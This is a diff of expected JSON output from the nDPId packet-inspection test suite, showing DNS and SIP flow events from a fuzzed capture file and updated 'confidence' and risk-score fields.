 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1120470067291,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470067291,"pkt":"ADBUADRWAODtAW69CABFAABIanwAAIARTNXAqAECwKgBAQq+ADUANBAIP8gBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470069294,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1120470069294,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470069294,"pkt":"ADBUADRWAODtAW69CABFAABIan0AAIARTNTAqAECwKgBASq+ADUANBAIP8gBAAABAAAAAAAABF9zaXAEX3VkcAR2b2lwB2JydWp1bGEDbmV0AAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470069294,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470069294,"flow_last_seen":1120470069294,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470069294,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":10942,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1120470071297,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470071297,"pkt":"ADBUADREAODtAW69CABFAABIan4AAIAR7NPAqAECwKgBAQq+ADUANBBXP8gBqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":243,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470066293,"flow_last_seen":1120470071297,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470071297,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":244,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470066293,"flow_last_seen":1120470075303,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470075303,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.vo_s","num_queries":0,"num_answers":0,"reply_code":0,"query_type":25202,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":243,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470066293,"flow_last_seen":1120470071297,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470071297,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":244,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470066293,"flow_last_seen":1120470075303,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470075303,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.vo_s","num_queries":0,"num_answers":0,"reply_code":0,"query_type":25202,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469985981,"flow_last_seen":1120469994988,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470083305,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469986976,"flow_last_seen":1120469986976,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470083305,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2730,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470083305,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1120470083305,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470083305,"pkt":"ADBUADRWAODtAW69CABFAABEaoAAAIARTNXAqAESwKgBAQq\/ADUAMAo2GsoAAAABAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470083305,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470083305,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470083306,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1120470083306,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470083306,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARt8vAqAEBwKgBAgA1Cr8AR+yxGsqAAAABAAEAAAAAATEBMCVzADEyNwdpbi1hZGRyBGFycGEAAAwAARoMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470083306,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470083306,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083310,"flow_last_seen":1120470083310,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470083310,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1120470083310,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470083310,"pkt":"ADBUADRWAODtAW69CABFAABIaoIAAIARTM\/AqAECwKgBAQrAADUANLk4cMwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083310,"flow_last_seen":1120470083310,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470083310,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083310,"flow_last_seen":1120470083310,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470083310,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1120470084306,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470084306,"pkt":"ADBUADRWAODtAW69CABFAABIaoQAAIARTM3AqAECwKgBAQrAADUANLk4cMwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470084827,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00943{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1120470084827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"ts_msec":1120470084827,"pkt":"ADBUADRWAODtAW69CABFAAGTaoUAAIARzJTAqAECyEQlcxDEE8QBf5mcQ0FOQ0VMIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7YnJhbmNoPXo5aEc0YktucDEwNDk4NDA1My00NGNlNGE0MTE5Mi4xNjguMS4yO3Jwb3J0DQpGcm9tOiAiYXJpayIgPHNpcDo4MTY2ajZAdm9pcC5icnVyanVsYS5uZXQ+O3RhZz02NDMzZWY5DQpUbzogPHNpcDo5NzIzOTI4NzA0NEB2b2lwLmhydWp1bGEubmX0Pg0KQ2FsbC1JRDogMTA1MDkwMjU5LTQ0NmZhZjdhQDE5Mi4xNjguMS4yDQpDU2VhOiAxIENBTkNFTA0KQ29udGVudC1MZW5ndGg6IDANCk1heC1Gb3J3YXJkczogNzANClVzZXItQWdFbnQ6IE5lJXMAU0lQUFMgSVAgUGhvbmUgVmVyc2lvbiAyLjAuNTEuMTYNCg0K"}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470084827,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470084827,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":180000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"ts_msec":1120470085969,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1120470085969,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":389,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":389,"pkt_l4_len":273,"ts_msec":1120470085969,"pkt":"ADBUADRWAODtAW69CABFAAElcwAAAIARzK\/AqAECyER4URMlcwABY9CsQUNLIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2U2lwLmJydXJqdYVhLm5ldD47dGFnPTY0MzNlZjkNCkNhbGwtSUQ6IDEwNTA5MDI1OS00NDZmYWY3YUAxOTIuMTY4LjEuMg0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjo1MDYwO2JyYW5jaD16OWhHNGJLbnAxMDQ5ODQwNTMtNJ9jZTRhNDExOXkuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":180000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"ts_msec":1120470085969,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":180000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"ts_msec":1120470085969,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470086308,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1120470086308,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470086308,"pkt":"ADBUADRmAODtAW69CABFAABIaocAAIARTMrAqAECZqgBAQrAADUANLk4cMwBAAABAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470086308,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470086308,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1120470088311,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470088311,"pkt":"ADBUADRWAODtAW69CABFAABIaokAAIARTMjAqAECwKgBAQrAADUANLk4cMwhAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
